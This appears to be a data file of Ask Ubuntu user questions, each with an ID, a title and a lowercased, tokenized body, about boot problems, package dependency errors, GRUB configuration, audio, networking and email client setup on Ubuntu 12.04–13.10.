389765	ubuntu 12.04 lts does not boot with enabled ide controller	i can not boot ubuntu 12.04 lts with the ide controller enabled . similar problems ( with asus mainboards ) were described in the threads http : //ubuntuforums.org/showthread.php ? t=1662883 , and http : //ubuntuforums.org/showthread.php ? t=1891554 i have a dualboot system ( win7 ) and installed ubuntu via usb , i have an asus m4a88td-v evo/usb3 . after the installation , ubuntu could not boot . there was simply a violett screen or only a blinking cursor . so i used noplymouth to see what happened and it stopped at the two ide devices ( dvd drives ) . i tried a bios update and booting with `` all_generic_ide '' ( i thought this may help since it has to do with ide ) , but only disabling the ide controller in the bios helped . is there maybe a known solution to this problem , which apparently has to do with these asus mainboards ? thanks for any help !
389766	dpkg returned an error code ( 2 )	# computer @ computer-satellite-l755 : ~ $ sudo apt-get install reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libllvm2.9 : depends : libc6 ( > = 2.11 ) but it is not installed depends : libffi6 ( > = 3.0.4 ) but it is not installed depends : libgcc1 ( > = 1:4.1.1 ) but it is not installed depends : libstdc++6 ( > = 4.6 ) but it is not installed predepends : multiarch-support but it is not installed e : unmet dependencies . try using -f. # # # computer @ computer-satellite-l755 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg gcc-4.6-base libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libc-bin libc6 libdb5.1 libffi6 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl multiarch-support perl-base tar tzdata xz-utils zlib1g suggested packages : debconf-doc debconf-utils whiptail dialog gnome-utils libterm-readline-gnu-perl libgtk2-perl libnet-ldap-perl libqtgui4-perl libqtcore4-perl apt glibc-doc locales bzip2 ncompress xz-lzma the following new packages will be installed : apt-utils coreutils debconf debconf-i18n dpkg gcc-4.6-base libacl1 libapt-inst1.4 libapt-pkg4.12 libattr1 libbz2-1.0 libc-bin libc6 libdb5.1 libffi6 libgcc1 liblocale-gettext-perl liblzma5 libselinux1 libstdc++6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl multiarch-support perl-base tar tzdata xz-utils zlib1g 0 upgraded , 29 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/14.4 mb of archives . after this operation , 42.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y e : can not get debconf version . is debconf installed ? debconf : apt-extracttemplates failed : no such file or directory dpkg : error : syntax error in triggers deferred file `/var/lib/dpkg/triggers/unincorp ' at character `t ' midline e : sub-process /usr/bin/dpkg returned an error code ( 2 ) # # computer @ computer-satellite-l755 : ~ $ cd/var/lib/dpkg/available bash : cd/var/lib/dpkg/available : no such file or directory computer @ computer-satellite-l755 : ~ $ cd/var/lib/dpkg/status bash : cd/var/lib/dpkg/status : no such file or directory computer @ computer-satellite-l755 : ~ $ cd/var/lib/dpkg/diversions bash : cd/var/lib/dpkg/diversions : no such file or directory computer @ computer-satellite-l755 : ~ $ ls -1 adun brasero-session.log calibre library c : \nppdf32log\debuglog.txt desktop documents downloads examples.desktop gnustep music pictures public templates ubuntu one untitled document videos win7-uninstall.tar.gz computer @ computer-satellite-l755 : ~ $
389774	how can i connect my iphone with ubuntu ?	can not connect iphone 5 ios7 to ubuntu 12.04 endless loop of 'trust this computer ' if i trust it . the device 'samis ' is locked . enter the passcode on the device and click 'try again ' . unable to mount device with message dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) how can i connect my iphone with ubuntu ?
389776	how to change ibus input methods with shift+caps lock ?	i like how the different keyboard layouts are handled in ubuntu - i can customize the switching keyboard shortcut to +caps lock , i can rig the caps lock keyboard led to show the alternate keyboard layout ... but it find it much more convenient to use the ibus transliteration stuff instead of switching the keyboard lauouts . i understand , that keyboard layouts are completely different thing and entirely unrelated to the ibus stuff . i 'd like to mimic the keyboard layout handling behaviour with ibus , specifically the switching with the input methods with shift+caps lock ( and as a bonus - rigging the led to show that the alternate input method is used ... ) on ibus-setup i see no way to set the next input method as shift+caps lock . i tried also by trying some `` +caps-lock '' , `` +capslock '' , `` +caps '' , `` +caps lock '' values . maybe i do n't know how to spell the `` caps lock '' properly ...
389780	temporarily use a different version of a package to resolve unmet dependency	how can i temporarily use a different version of a package so that i can install another package that depends on it ? or is it not possible to do that ?
389793	least bad way to shutdown quickly	sometimes i would like to shut down in a hurry . by hurry i mean 5 to 10 seconds . assume i can run any script with root privileges in tty which i 've prepared beforehand , and after 5 or 10 seconds the power will go out . what 's the best way to minimize the damage ( like maybe unmounting all devices , or closing all open files ) ?
389796	dependency problems prevent configuration of rhythmbox-plugins	i get these error messages when i try to update or install programs on linux 13.04 installarchives ( ) failed : dpkg : dependency problems prevent configuration of rhythmbox-plugins : rhythmbox-plugins depends on librhythmbox-core8 ( = 3.0.1-1ubuntu5~ppa0 ) ; however : package librhythmbox-core8 is not installed . dpkg : error processing rhythmbox-plugins ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox : rhythmbox depends on librhythmbox-core8 ( = 3.0.1-1ubuntu5~ppa0 ) ; however : package librhythmbox-core8 is not installed . dpkg : error processing rhythmbox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-rb-3.0 : gir1.2-rb-3.0 depends on librhythmbox-core8 ( > = 3.0.1 ) ; however : package librhythmbox-core8 is not installed . dpkg : error processing gir1.2-rb-3.0 ( -- configure ) : dependency problems - leaving unconfigured unpacking librhythmbox-core8 ( from ... /librhythmbox-core8_3.0.1-1ubuntu5~ppa0_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/librhythmbox-core8_3.0.1-1ubuntu5~ppa0_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/librhythmbox-core.so.8.0.0 ' , which is also in package librhythmbox-core7 3.0.1-0~13.10~ppa1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/librhythmbox-core8_3.0.1-1ubuntu5~ppa0_i386.deb dpkg : dependency problems prevent configuration of rhythmbox-plugins : rhythmbox-plugins depends on librhythmbox-core8 ( = 3.0.1-1ubuntu5~ppa0 ) ; however : package librhythmbox-core8 is not installed . dpkg : error processing rhythmbox-plugins ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox : rhythmbox depends on librhythmbox-core8 ( = 3.0.1-1ubuntu5~ppa0 ) ; however : package librhythmbox-core8 is not installed . dpkg : error processing rhythmbox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-rb-3.0 : gir1.2-rb-3.0 depends on librhythmbox-core8 ( > = 3.0.1 ) ; however : package librhythmbox-core8 is not installed . dpkg : error processing gir1.2-rb-3.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-mozilla : rhythmbox-mozilla depends on rhythmbox ( = 3.0.1-1ubuntu5~ppa0 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-mozilla ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-magnatune : rhythmbox-plugin-magnatune depends on rhythmbox ( = 3.0.1-1ubuntu5~ppa0 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-magnatune ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-zeitgeist : rhythmbox-plugin-zeitgeist depends on rhythmbox ( > = 3.0 ) ; however : package rhythmbox is not configured yet . rhythmbox-plugin-zeitgeist depends on rhythmbox ( < < 3.1 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-zeitgeist ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugin-cdrecorder : rhythmbox-plugin-cdrecorder depends on librhythmbox-core8 ( > = 3.0 ) ; however : package librhythmbox-core8 is not installed . rhythmbox-plugin-cdrecorder depends on rhythmbox ( = 3.0.1-1ubuntu5~ppa0 ) ; however : package rhythmbox is not configured yet . dpkg : error processing rhythmbox-plugin-cdrecorder ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-ubuntuone : rhythmbox-ubuntuone depends on rhythmbox ( > = 2.95.5 ) ; however : package rhythmbox is not configured yet . hope you can help me and guide me to how to solve this problem .
389807	where is my cursor ?	my os is ubuntu 13.10 , i use the following code to remove the kde desktop installed before : sudo apt-get purge kde* and then use the following code to install gnome 3.10 : sudo add-apt-repository ppa : gnome3-team/gnome3-next & & sudo apt-get update sudo apt-get update & & sudo apt-get install gnome-shell ubuntu-gnome-desktop sudo add-apt-repository ppa : gnome3-team/gnome3-staging sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update & & sudo apt-get dist-upgrade after all these were done , i restart my computer and can not find my cursor in unity while all things are ok in gnome . i want to find the cursor in unity , what should i do ? any help or suggestions will be appreciated !
389810	gui to control sound	is there any good gui app to control my sound settings ? when i use ubuntu , i use the sound indicator and have no problems with sound configuration . unfortunately , sometimes sound stops working when i use an ubuntu based distribution ( for example , lubuntu and bodhi ) . i searched in google and read about pulseaudio . unfortunately , i did not manage to install it correctly . this is not an easy topic for me . thanks in advance
389811	no sound out of laptop speakers when unplug external speakers	when i unplug a set of speakers from my machine the audio no longer comes out of the built in speakers . the strange thing is that it doesnt seem to be reproducible . sometimes it happens , others it does n't . mightily confused ... my mahcine is a sony vaio pro , and i am running 13.10 with the cinnamon desktop . any suggestions are most appreciated ...
389813	monitor shows out of range despite correct grub settings , even in runlevel 3	i am experiencing a helluva annoying error . my dev-pc , that runs on ubuntu server ( 12.04.3 ) , does n't give output anymore . after moving i reconnected it to a new ( widescreen , other than before ) monitor . i already tried the widely spread solution with the grub-settings ( screen resolution `` out of range '' ' . when it boots , it shows the whole grub-menu correct , even when loading the system , but then the monitor just goes black and shows 'out of range ' . i set it to runlevel 3 via ssh , but that did n't work either . hope you can help me , though i do n't have to set the thing up again . thanks in advance
389816	copying only files without extension via scp	i have a strange situation that i need to solve . in a server i have several files stored , which are named : area01 area01.hst area01.rst ... area02 area02.hst area02.rst ... etc . with some other files in there too . in order to retrieve those files , i would generally use scp server : ~/area* location/in/my/computer . the problem is , what if i only need to retrieve the files areaxx ( without extension ) ? the only solution i can figure out is assigning an extension to those files and then retrieve them using scp server : ~/area*.newextension location/in/my/computer any other ideas ? thanks in advance .
389819	multisite restore script error	i just tried to restore my websites backup with a script . the problem is that it said that it 's not correct . perhaps i 've misused the `` do '' command . can you tell me what needs to be changed to get this script to work ? thanks in advance list=' backup-12.11.2013_11-07-****.tar.gz backup-12.11.2013_11-14-****.tar.gz backup-12.11.2013_15-35-**.tar.gz backup-12.11.2013_15-36-***.tar.gz for i in $ list do /scripts/restorepkg $ i done
389822	update-grub syntax error while using grub-customizer	after trying to make any change update-grub returns this error generating grub.cfg ... found linux image : /boot/vmlinuz-3.8.0-34-generic found initrd image : /boot/initrd.img-3.8.0-34-generic found linux image : /boot/vmlinuz-3.8.0-29-generic found initrd image : /boot/initrd.img-3.8.0-29-generic found windows 8 ( loader ) on /dev/sda2 found windows recovery environment ( loader ) on /dev/sda6 adding boot menu entry for efi firmware configuration error : syntax error . error : incorrect command . error : syntax error . error : incorrect command . error : syntax error . error : line no : 135 syntax errors are detected in generated grub config file . ensure that there are no errors in /etc/default/grub and /etc/grub.d/* files or please file a bug report with /boot/grub/grub.cfg.new file attached . done /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=2 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode= '' 640x480 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' tried even adding # fix broken grub.cfg gen grub_disable_submenu=y but with no help /boot/grub/grub.cfg.new # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod efi_gop insmod efi_uga insmod video_bochs insmod video_cirrus } insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt8 ) ' search -- no-floppy -- fs-uuid -- set=root a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt8 ) ' search -- no-floppy -- fs-uuid -- set=root a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux_proxy # # # menuentry `` ubuntu '' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt8 ) ' search -- no-floppy -- fs-uuid -- set=root a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 linux /boot/vmlinuz-3.8.0-34-generic root=uuid=a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-34-generic } submenu `` other '' { menuentry `` windows 8 ( loader ) ( on /dev/sda2 ) '' -- class windows -- class os { insmod part_gpt insmod fat set root= ' ( hd0 , gpt2 ) ' search -- no-floppy -- fs-uuid -- set=root 1493-5a87 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` windows boot uefi loader '' { search -- fs-uuid -- no-floppy -- set=root 1493-5a87 chainloader ( $ { root } ) /efi/boot/bkpbootx64.efi } menuentry `` ubuntu , with linux 3.8.0-34-generic ( recovery mode ) '' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt8 ) ' search -- no-floppy -- fs-uuid -- set=root a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 echo 'loading linux 3.8.0-34-generic ... ' linux /boot/vmlinuz-3.8.0-34-generic root=uuid=a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-34-generic } submenu `` previous linux versions '' { menuentry `` ubuntu , with linux 3.8.0-29-generic '' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt8 ) ' search -- no-floppy -- fs-uuid -- set=root a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 linux /boot/vmlinuz-3.8.0-29-generic root=uuid=a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-29-generic } menuentry `` ubuntu , with linux 3.8.0-29-generic ( recovery mode ) '' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt8 ) ' search -- no-floppy -- fs-uuid -- set=root a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 echo 'loading linux 3.8.0-29-generic ... ' linux /boot/vmlinuz-3.8.0-29-generic root=uuid=a80cd27b-9937-46d7-8bcb-e9b2ec8e10c9 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-29-generic } } function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry `` windows uefi bkpbootmgfw.efi '' { search -- fs-uuid -- no-floppy -- set=root 1493-5a87 chainloader ( $ { root } ) /efi/microsoft/boot/bkpbootmgfw.efi } menuentry `` efi/asclepius/bootx64.efi '' { search -- fs-uuid -- no-floppy -- set=root 1a98-3f22 chainloader ( $ { root } ) /efi/asclepius/bootx64.efi } menuentry `` windows recovery environment ( loader ) ( on /dev/sda6 ) '' -- class windows -- class os { insmod part_gpt insmod fat set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 1a98-3f22 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` system setup '' { fwsetup } # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi } # # # end /etc/grub.d/10_linux_proxy # # # and mentioned line 135 starts here : function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if you have any ideas how to fix this , thank you in advance .
389824	after installing kde enviroment in ubuntu 13.10 mouse cursor is hidden	after installing the last kde in ubuntu 13.10 mouse cursor is hidden . only in unity , kde and gnome is ok. my hardware is asus vivobook s400ca .
389825	thunderbird lightning pt-pt	where can i find portuguese ( pt-pt ) language for thunderbird lightning ? i ca n't find it anywhere .
389828	finding a highly customisable ( compose message ) email client that works with exchange 2007 !	ubuntu : 13.04 - raring exchange : ms 2007 thunderbird : 1:24.1.1+build1-0ubuntu0.13.04.1 evolution : 3.6.4-0ubuntu1 evolution-mapi : 3.6.2-0ubuntu1 evolution-ews : 3.6.1-0ubuntu1 my company uses exchange for mail and also has a 'brand style ' email template and signature . i ca n't seem to find a good linux solution that allows both to work to company standards . the company 's brand formatting it is essentially a calibri font/sans-serif ; font size:11.0pt ; colour # 1f497d . any linux mail i use must be able to default to that when i write a new message , forward or reply . this has been set up because the rest of the company uses outlook . initially i had hoped to use thunderbird , and bought an exquilla licence which sync 's perfectly ( though slower than outlook ) . however the colour # 1f497d is n't one of the default swabs for colour choices avaible under preferences > composition > general > html > text colour . i could get the right colour by manually copy pasting the hex code into the colour selection tool in the write window ... but this was fiddly and requires me to keep the hex code constantly on hand ... instead i installed last colour picker , which jumps to the last swab i used . more useful ... but still not ideal . evolution offers a one up in this respect , i think i can here customise the composition look of my email as per company standards ... so i looked to move ... exchange server 2007 settings this guide initially looked very good . so i aimed to install evolution and mapi . sudo apt-get install evolution sudo apt-get install evolution-mapi and so i installed evolution and evolution support for the groupware suite . i quickly found i could n't select the correct protocol , however this was resolved by installing the missing dependency , as per this solution via : sudo apt-get install python-samba this seemed to be working better . i made an account as follows using the evolution account assistant , i 've included dummy names . full name : joe blogs email address : joeb @ mycompany.co.uk the mapi attempt so first i tried setting server type under 'recieving email ' to exchange mapi . for configuration my server settings were initially : server : exchange.mycompany.co.uk username : joeb domain name : [ empty ] so i entered domain name in as `` mycompany.co.uk '' ... authenticate ... entered by ( definitely correct ) password . however in the mail authentication request box it rejects the password and says password is incorrect . i 've juggled with these heavily trying my owa address which is along the lines of mail.extention.ourcompanymailserver.net/owa ... no joy . so i went back over to thunderbird and the working server address i had tied into thunderbird : https : //mail.extention.ourcompanymailserver.net/ews/exchange.asmx following the thread here i tried by exchange address , still no joy . this site again suggested i used my server ip address ... however i do n't know that and there 's no sysadmin to help us here ! i figured i could just ping the server ping https : //mail.extention.ourcompanymailserver.net/ which came back with an ip that i then stuff into evolution.. no joy . i then noticed there was an evolution ews module . which i installed sudo apt-get install evolution-ews which seemed to get me further , now i could get through the initial install and appeared to get a working setup , but a sync from my server was n't forthcoming an ews_debug=2 evolution gives me lots of '' ( evolution:16603 ) : gtk-critical ** : gtk_entry_set_text : assertion `text ! = null ' failed '' sadly turned up nothing on google ... and so i 'm stumped . i ca n't seem to move to thunderbird because it wo n't customise my email in a way that suits my company ... and i ca n't use evolution because of exchange issues ... it be great to get this setup as my entire home setup is linux ... and i have quiet designs to get more of my colleagues to shift given their windows 8 frustrations ! any advice on resolving this ... or a smarter point of intervention ( thunderbird ? ) would be much appreciated !
389830	export : * not a valid identifier , whenever i use bash ?	i keep seeing -bash : export : `= ' : not a valid identifier -bash : export : `/usr/lib/jvm/default-java ' : not a valid identifier -bash : export : `= ' : not a valid identifier -bash : export : `/usr/share/tomcat7 ' : not a valid identifier i know its when i was installing tomcat7 and java stuff but i ca n't remember where i made these changes .
389831	lejos build help !	i 'm currently trying to install lejos in my ubuntu laptop ( 12.04 ) and i 've followed the instructions from here but i 'm unable to build it . ( http : //code.google.com/p/lego-mindstorms-3d-printing-machine/wiki/setuplejos ) when i type `` ant '' it shows the following error : buildfile : /opt/lejos_nxj/build/build.xml jlibnxt : clean : jlibnxt : build failed /opt/lejos_nxj/build/build.xml:87 : the following error occurred while executing this line : /opt/lejos_nxj/build/libnxt/build.xml:39 : ca n't create history file total time : 0 seconds can somebody help me fix this error ? oh and one more thing - how does one set environment paths/variables ? ( which is the next step )
389834	how to run application from terminal forever ?	i start jenkins web server using command java -jar jenkins.war . it works great . when i close terminal the application stops . how to make it run even if i close terminal session ?
389835	lubuntu 12.10 with encrypted drive fails to boot after upgarde to 3.5.0-30-generic and nvidia-331	i have a lenovo w530 with nvidia k1000m and an encrypted hard-drive and am having some issues booting my lubuntu 12.10 machine after an apt-get update and apt-get upgrade . i get kicked into ( initramfs ) command prompt with a message saying /dev/mapper/lubuntu-root is n't found , which is correct as i 'm never asked to enter the passphrase to unlock /dev/sda5 . i 've managed to boot the machine with a live cd , decrypt the drive and access its contents ( updated /etc/crypttab ; changed uuid ( ) to /dev/sda5 and rebuilt initramfs to no avail ) . what else am i missing from the boot sequence which would force cryptsetup to run ?
389843	how to upload or save on ftp to /www folder on ubuntu 12.04 localhost ?	i just start to use ubuntu as os and would like to ask what 's the best practice to use apache and save my files on /www saving by programs or ftp . thanks a million !
389845	broken network , broken network configuration	my ubuntu 12.04.3 was not able to connect via lan so i tried some steps which were here in askubuntu . i have probably mixed it and caused that i cant use network anymore . even when boot , some message appears that ubuntu is waiting for network configuration , ( then another message that system is waiting 60 more seconds for network config , and then that ubuntu will be booted withou network ) . could you help me please how to repair network , that i would work again . also how to enable wired lan connection ? i tried reinstall network-manager , it was not working ( unable to modify some locked directory ) edit : well after hard googling i found out that my wlan card firmware has some unknown problem . ( iwlan scanning informs me that `` network is down '' ) . the simplest solution could be reinstalling wlan card firmware . because i am beginner and my experiences with ubuntu are poor , i would like to ask you for help . i ca n't do it without your help ... i have realtek rtl8723ae wlan card ( according to lspci ) . i dont have any internet connection on my ubuntu notebook , i have to download packages through windows boot to ubuntu and install it in offline mode . thank you for your help in advance .
389846	is it possible to install packages from another linux distribution ?	to be more precise , an executable returns this error : error while loading shared libraries : libftdi1.so.2 : can not open shared object file : no such file or directory i ca n't find that library for ubuntu , but there is one for opensuse so is there some way i can run this application via ubuntu ?
389850	proxy on ubuntu	the goal is to have ubuntu machine act as a proxy for another machine on wan . what is the simplest way to accomplish that ? to explain in more detail : there are two machines on the same wan , but one of them can access the internet and another one ca n't . it 's possible to talk from one machine to another , though . so the point is to set up the proxy server on the internet-able machine ( having ubuntu installed ) . note : this is not about using one machine as the bridge on the same lan , that can be done easily , this is a different approach ( as i understand it ) .
389859	ubuntu 13.10 error during installaton	i create usb pen drive by using universal usb installer of ubuntu 13.10 x64 . during copying the files , it generate error , such as dvd or usb does not contains files . what should i do ?
389865	clearing out old kernels from terminal	i do not have enough disk space to download or upgrade . how do i list all kernels and clear out old ones from terminal ? i 'm using ubuntu 12.10 .
389867	how to create recovery dvd ?	i have brought dell vostro 2520 . it has preinstalled ubuntu . can you please tell to how to create recovery disk ? so that after format , i can reinstall ubuntu .
389869	how to type `` 単 '' with a uk keyboard layout ?	how can i type `` 単 '' with a uk layout using altgr ? i 'd like to be able to just press altgr+ and get `` 単 '' .
389870	can intel srt be enabled back once ubuntu is installed ?	i have a new sony vaio ultrabook svt141a11l and i 'd wish to install ubuntu 13.10 along side its preinstalled windows 8 . i know i have to disable intel srt for the installation from the live usb but i wonder if i can enable it back once ubuntu is installed . would anybody have a word on that ? thank you , ts
389873	red led & no sound out on headphone on macbook 5.2 with ubuntu 12.04.3 lts	i have macbook white 5.2 mid 2009 model and i 've installed ubuntu 12.04.3 lts and all works wonderfull but headphones has a red led and do n't works , the speakers works fine . all answers posted with other models not work for me , thanks !
389874	icons in the top panel wo n't change	i recently tried a new theme on ubuntu 13.10 , and when i decided to go back to the default settings all of the icons in the top status bar tray were different the default theme pack . i was wondering how you could reset the theme back to the default settings , as apparently i did it incorrectly .
389877	no option to install ubuntu alongside windows 8	while trying to install ubuntu , the installer does not give me the option of installing alongside windows 8 . it instead gives me the option to install inside windows 8 . what should i do ?
389880	installation of epson scanner on ubuntu	how do i install an epson scanner sx200 on ubuntu 12.04 32 bit ? i have tried the simple scanner and it does not work
389881	keep external hdmi monitor on	i am running xbmc ( frodo ) on an asus u47a laptop ( intel sandybridge graphics ) with ubuntu 12.04 . the laptop is connected to an older phillips 27 '' tube hdtv via hdmi . what i would like is for xbmc to stay running , and appear when i turn on my tv . what actually happens is that when i turn off my tv , the hdmi signal stops and does n't resume when the tv is turned back on . to re-enable the signal , i 've got to open the laptop lid which re-enables the laptop screen , and i guess figures out that the tv is there and turns it on as well - but rearranges my windows , so xmbc is n't where it was . alternately , i can unplug and replug the hdmi , but that 's annoying too . i know that the tv is older , but the functionality i expect worked fine when running xbmc on an old macbook , so i know it can work . i 've tried for about a week so far , with no luck . obviously i 've tried setting the lid actions to 'nothing ' in the settings . i 've tried disabling the lid switch ( as per here ) hoping to keep ubuntu from disabling the laptop monitor and rearranging everything - but no luck . shutting the lid still reconfigures the monitors . i 've tried various combinations of gconf , dconf and settings to force ubuntu to keep the hdmi on . i 've tried to disable dmps ( as per here ) in hopes of preventing the sleep in the first place . i 've even logged the callbacks via these instructions to see if i can detect a signal when the tv is powered on . i do not get any callbacks when the tv goes off or on . i have had marginal success reactivating the tv after it 's been powered on by sending the command xset dmps force off , which blanks both screens , then when the mouse is moved or a key pressed the tv wakes . sending xset dmps force on does not wake up the tv - it has to go off and back on . however , those commands re-enables dmps , which i 've tried to turn off , so i do n't think it 's a solution either . another item of interest is that when i do the xset dmps force off , a xset -q shows `` dmps on , monitor on '' . but when i do a xset -dmps to turn it off , the -q shows `` dmps off '' and does n't mention the monitor state at all . in the end , it would be nice if ubuntu did not alter the hdmi signal at all - sending continuously . i would like to leave the laptop lid shut , and the hdmi signal to be going when i turn the tv on . i 'm not a long-term linux user , but i 'm willing to try just about anything to get this to work ! thanks !
389882	installtion of ubuntu 12.04 stuck at the end	am installing ubuntu 12.04 next to windows xp prof . installation went all the way thro to `` restart '' , now is stuck on a black screen list beginning , `` starting crash report '' and ending with `` asking all processes to terminate '' . this is the second time i have tried to install ubuntu , got stuck the first reboot on `` grub 2 '' and i can no longer boot into windows xp , i have read all the solutions about starting with the ubuntu cd and typing into a `` terminal '' instructions , but just how does one reach a terminal when everything is stuck and nothing moves . am desperate here , no dual reboot , no windows , no ubuntu .
389885	loud crack on speakers during boot	just installed ubuntu 12.4.2 on my old sony vaio . during the early part of the boot up there is a loud crack noise from the speakers . any suggestions to suppress this ?
389887	no multi boot after installing ubuntu 12 with winxp	i managed to install ubuntu 12 alongside with my previously installed winxp on my toshiba satellite c655 . when the installation finished , i restarted the laptop and prepared myself to select ubuntu from the multi boot menu . i was surprised when it booted to winxp without asking me which os to load ... no multi boot menu at all ... i 'm new to linux , hope someone can help me to fix this . please let me know if you need some technical details from me . thank you in advance . regards , viktor
